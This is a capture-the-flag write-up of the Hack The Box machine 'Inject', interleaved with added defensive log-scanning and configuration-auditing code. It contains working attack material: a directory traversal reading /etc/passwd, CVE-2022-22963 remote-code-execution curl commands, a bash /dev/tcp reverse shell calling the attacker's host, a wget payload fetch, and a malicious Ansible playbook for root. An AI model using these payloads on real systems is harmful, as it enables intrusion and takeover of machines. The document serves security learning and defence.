Inject @ Hack The Box
A write-up on HTB Inject Box
Inject was a Linux box created by rajHere at Hack The Box. The machine was rated easy in difficulty and was worth 20 points.
Reconnaissance
Enumeration
I started with reconnaissance for the initial information gathering and scanned the machine (10.10.11.204) using nmap.
┌──(kali㉿blackbox)-[~/Documents/HTB/Boxes/Inject]
└─$ nmap -A 10.10.11.204
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 00:12 IST
Nmap scan report for 10.10.11.204
Host is up (0.24s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
1077/tcp filtered imgames
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
|_http-open-proxy: Proxy might be redirecting requests
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.56 seconds
Having found an open HTTP service on port 8080, it was time to browse to it and view the site.
Foothold
We can find an upload link in the top right corner that might enable us to upload something to the server. After going to the link, we tried to upload an image. The image got uploaded, and now we had an option to view the image.
I tried viewing the image uploaded to the server.
I also intercepted the image-view request using Burp Suite and found the following:
This prompted me to attempt directory traversal and check whether such a vulnerability existed.
It returned the complete list of the different accounts existing on the machine. I found three of the accounts in the response to be very helpful, including root. The complete response is given below:
HTTP/1.1 200
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 1986
Date: Fri, 12 May 2023 17:54:55 GMT
Connection: close
root:x:0:0:root:/root:/bin/bash
...
frank:x:1000:1000:frank:/home/frank:/bin/bash
...
phil:x:1001:1001::/home/phil:/bin/bash
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:997:996::/var/log/laurel:/bin/false
Lateral Movement
Checking the entries of these users, we came across the home directory of user phil. Looking up the contents of phil's home directory gives the location of the user flag, user.txt.
As per the nmap scan, we earlier found two services running on Inject:
1077/tcp filtered imgames
8080/tcp open nagios-nsca Nagios NSCA
I searched for any possible vulnerability to pwn the user phil. At last, I came across CVE-2022-22963, a Spring Cloud Function vulnerability in which a specially crafted SpEL expression supplied as the routing expression leads to remote code execution (RCE). This would let us run any shell command on the machine. I tried exploiting the vulnerability to start a Python HTTP server.
┌──(kali㉿blackbox)-[~/…/HTB/Boxes/Inject/guide]
└─$ curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("python3 -m http.server 9999")' --data-raw 'data' -v
With that attempt, I successfully started the HTTP server on port 9999 using the RCE. Visiting the URL http://10.10.11.204:9999 brought me to the following screen:
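From the defender's side, both findings above (the traversal in the image-view parameter and the routing-expression header abused in CVE-2022-22963) are visible in request logs. The following is an added example, not code from the write-up: it scans constructed sample log lines and assumes a reverse proxy logs the request line plus headers as JSON (the image endpoint name /show_image is also assumed).

```python
import json
import re
from urllib.parse import unquote

# Constructed sample lines (not captured from the box), one request per line:
# "<timestamp>\t<method>\t<path+query>\t<headers as JSON>"
SAMPLE_LOG = """\
2023-05-12T17:50:01Z\tGET\t/show_image?img=cat.jpg\t{"User-Agent":"Mozilla/5.0"}
2023-05-12T17:54:55Z\tGET\t/show_image?img=../../../../etc/passwd\t{"User-Agent":"Mozilla/5.0"}
2023-05-12T17:55:10Z\tGET\t/show_image?img=..%2F..%2F..%2Fetc%2Fpasswd\t{"User-Agent":"curl/7.88.1"}
2023-05-14T16:38:06Z\tPOST\t/functionRouter\t{"User-Agent":"curl/7.88.1","spring.cloud.function.routing-expression":"T(java.lang.Runtime).getRuntime().exec(\\"id\\")"}
2023-05-14T16:40:00Z\tPOST\t/functionRouter\t{"User-Agent":"curl/7.88.1"}
"""

TRAVERSAL = re.compile(r"\.\.[/\\]")          # "../" or "..\" after decoding
SPEL_TYPE_REF = re.compile(r"T\(\s*java\.")   # SpEL type reference, e.g. T(java.lang.Runtime)

def decode_fully(value, rounds=3):
    # Undo repeated URL-encoding so ..%2F and %252e%252e are caught as well.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyse_request(method, path, headers):
    """Return the list of detection labels that apply to one request."""
    findings = []
    if TRAVERSAL.search(decode_fully(path)):
        findings.append("path-traversal")
    lowered = {k.lower(): v for k, v in headers.items()}
    expr = lowered.get("spring.cloud.function.routing-expression")
    if expr is not None:
        # The header itself is the CVE-2022-22963 vector; legitimate clients never send it.
        findings.append("spel-routing-header")
        if SPEL_TYPE_REF.search(expr):
            findings.append("spel-type-reference")
    return findings

def scan_log(text):
    """Return (timestamp, path, findings) for every suspicious line."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, method, path, hdr_json = line.split("\t", 3)
        findings = analyse_request(method, path, json.loads(hdr_json))
        if findings:
            alerts.append((ts, path, findings))
    return alerts
```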
Privilege Escalation
I decided to upload a reverse shell script somewhere in /tmp/ and run it from the terminal to escalate the user privilege. Hence, I created a new directory by passing the command mkdir /tmp/hackStuff. The proof of the newly created directory is given below.
It was time to upload a script for getting the reverse shell. I created the following file, named rev.sh, and saved it in the directory ./src/ on my host machine.
#!/bin/bash
bash -i >& /dev/tcp/10.10.xx.xx/4444 0>&1
Before uploading it to the Inject machine, rev.sh was made executable by running chmod +x rev.sh. In order to upload the file to the vulnerable machine, I started a Python server on my host machine.
┌──(kali㉿blackbox)-[~/…/Boxes/Inject/guide/src]
└─$ sudo python -m http.server 7777
Serving HTTP on 0.0.0.0 port 7777 (http://0.0.0.0:7777/) ...
After starting the server, I used wget on the target to fetch rev.sh, triggered through the following curl request.
┌──(kali㉿blackbox)-[~/…/HTB/Boxes/Inject/guide]
└─$ curl -X POST http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.10.xx.xx:7777/src/rev.sh -O /tmp/hackStuff/rev.sh")' --data-raw 'data' -v
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.88.1
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.10.xx.xx:7777/src/rev.sh -o /tmp/hackStuff/rev.sh")
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 500
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Sun, 14 May 2023 16:38:06 GMT
< Connection: close
<
* Closing connection 0
{"timestamp":"2023-05-14T16:38:06.157+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}
Despite the HTTP 500 response (the SpEL expression is evaluated before the type-conversion error is raised), the file upload was successful, as can be seen below.
Now, I started listening on port 4444, as we could expect the reverse shell on running the recently uploaded script rev.sh.
┌──(kali㉿blackbox)-[~/…/Boxes/Inject/guide/src]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
I simply ran rev.sh by leveraging the vulnerability to gain the reverse shell. On executing the script, I got access to the account frank.
Gaining User (phil)
We already knew that the user flag is located in phil's home directory, so we tried browsing to it through the server. However, the current permissions were not sufficient to let us view its content.
Checking the contents of frank's home directory, I found an unusual hidden directory, .m2. This led me to explore the directory and the only file present in it, settings.xml. This file contained the password of user phil. I browsed this file at http://10.10.11.204:9999/home/frank/.m2/settings.xml.
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>ThePassword</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>
An alternative way to view this file is to go into the .m2 directory and run:
frank@inject:~/.m2$ cat settings.xml
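The lateral movement here hinges on a cleartext credential in a Maven settings.xml. Maven can store server passwords encrypted (it writes them as a {...} segment backed by settings-security.xml), so a quick audit is to flag every server entry whose password is not in that form. This is an added example, not the write-up's code; the sample file is constructed and the second and third server entries are placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the settings.xml found on the box (all values are placeholders).
SAMPLE_SETTINGS = """<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>ThePassword</password>
    </server>
    <server>
      <id>internal-repo</id>
      <username>ci</username>
      <password>{COQLCE6DU6GtcS5P=}</password>
    </server>
    <server>
      <id>key-only</id>
      <privateKey>${user.home}/.ssh/id_rsa</privateKey>
    </server>
  </servers>
</settings>
"""

ENCRYPTED_SEGMENT = re.compile(r"\{[^{}]+\}")   # Maven looks for a {...} segment anywhere in the value

def _local(tag):
    # Strip the XML namespace so the check works for SETTINGS/1.0.0 and POM/4.0.0 files alike.
    return tag.rsplit("}", 1)[-1]

def is_encrypted(value):
    """True if the value carries a Maven {base64} encrypted segment."""
    return ENCRYPTED_SEGMENT.search(value.strip()) is not None

def find_plaintext_passwords(xml_text):
    """Return (server id, username) for every <server> whose <password> is stored in clear."""
    findings = []
    for node in ET.fromstring(xml_text).iter():
        if _local(node.tag) != "server":
            continue
        fields = {_local(child.tag): (child.text or "") for child in node}
        pwd = fields.get("password")
        if pwd is not None and not is_encrypted(pwd):
            findings.append((fields.get("id", "?"), fields.get("username", "?")))
    return findings
```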
It was a turning point, as we extracted the user flag, user.txt, by running the following command after logging in to phil's account, since the flag was present in the user's home directory.
$ cat ~/user.txt
It resulted into user flag: 4f8b2c😈😈😈😈😈😈😈c10753
Gaining root
As a first step, I checked for files loaded by root processes by traversing the directory /opt/automation/tasks through the browser (as we already had the Python server running).
Root seemed to automatically execute the task specified in playbook_1.yml. With this information, I decided to create a new shell script on the victim machine that could later be run by a custom .yml file.
I ran echo <reverse shell payload> >> /tmp/root.sh through the current user's terminal. The same could be found through the browser as well.
Now, the next step was to execute root.sh by making root load a custom .yml file. I wrote the following exploit.yml to upload to the /opt/automation/tasks directory.
- hosts: localhost
  tasks:
    - name: RevSh
      command: bash /tmp/root.sh
Before uploading the file by starting a server on the host and running wget on the victim, I started listening on port 3434.
$ nc -lvnp 3434
Now, I served the file through port 6868 of the host machine and downloaded it on the victim machine.
As expected, soon after the file was downloaded, the root user loaded exploit.yml, which eventually ran the reverse shell script root.sh, giving me the reverse shell.
We could find the root flag, root.txt, in root's home directory, i.e., ~/root.txt.
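The root cause of the escalation is that a directory root executes playbooks from was writable by an unprivileged user. The following added example (not from the write-up) audits such a directory: it flags entries not owned by the trusted uid, writable by group or other, or symlinked, and builds a constructed layout in a temp directory to show the weak and corrected modes side by side. Because it runs as a normal user, the current uid stands in for root.

```python
import os
import stat
import tempfile

def audit_task_dir(path, trusted_uid=0):
    """Return (name, problem) pairs for the directory and each entry in it
    that a user other than the trusted owner could alter or redirect."""
    problems = []
    entries = [path] + [os.path.join(path, n) for n in sorted(os.listdir(path))]
    for p in entries:
        st = os.lstat(p)  # lstat: do not follow symlinks, report them instead
        name = "." if p == path else os.path.basename(p)
        if st.st_uid != trusted_uid:
            problems.append((name, "not owned by trusted uid"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            problems.append((name, "writable by group/other"))
        if stat.S_ISLNK(st.st_mode):
            problems.append((name, "symlink (target could be swapped)"))
    return problems

def demo():
    # Constructed layout mimicking /opt/automation/tasks: one legitimate playbook
    # and one dropped by another user. Returns (findings with weak modes, findings after fixing).
    d = tempfile.mkdtemp()
    good = os.path.join(d, "playbook_1.yml")
    dropped = os.path.join(d, "dropped.yml")
    for f in (good, dropped):
        with open(f, "w") as fh:
            fh.write("- hosts: localhost\n  tasks: []\n")
    os.chmod(good, 0o644)
    os.chmod(dropped, 0o666)
    os.chmod(d, 0o777)          # the weak setting: anyone can add a playbook here
    me = os.getuid()
    weak = audit_task_dir(d, trusted_uid=me)
    os.chmod(d, 0o755)          # the corrected setting: only the owner may write
    os.chmod(dropped, 0o644)
    fixed = audit_task_dir(d, trusted_uid=me)
    return weak, fixed

if __name__ == "__main__":
    weak, fixed = demo()
    print("weak:", weak)
    print("fixed:", fixed)
```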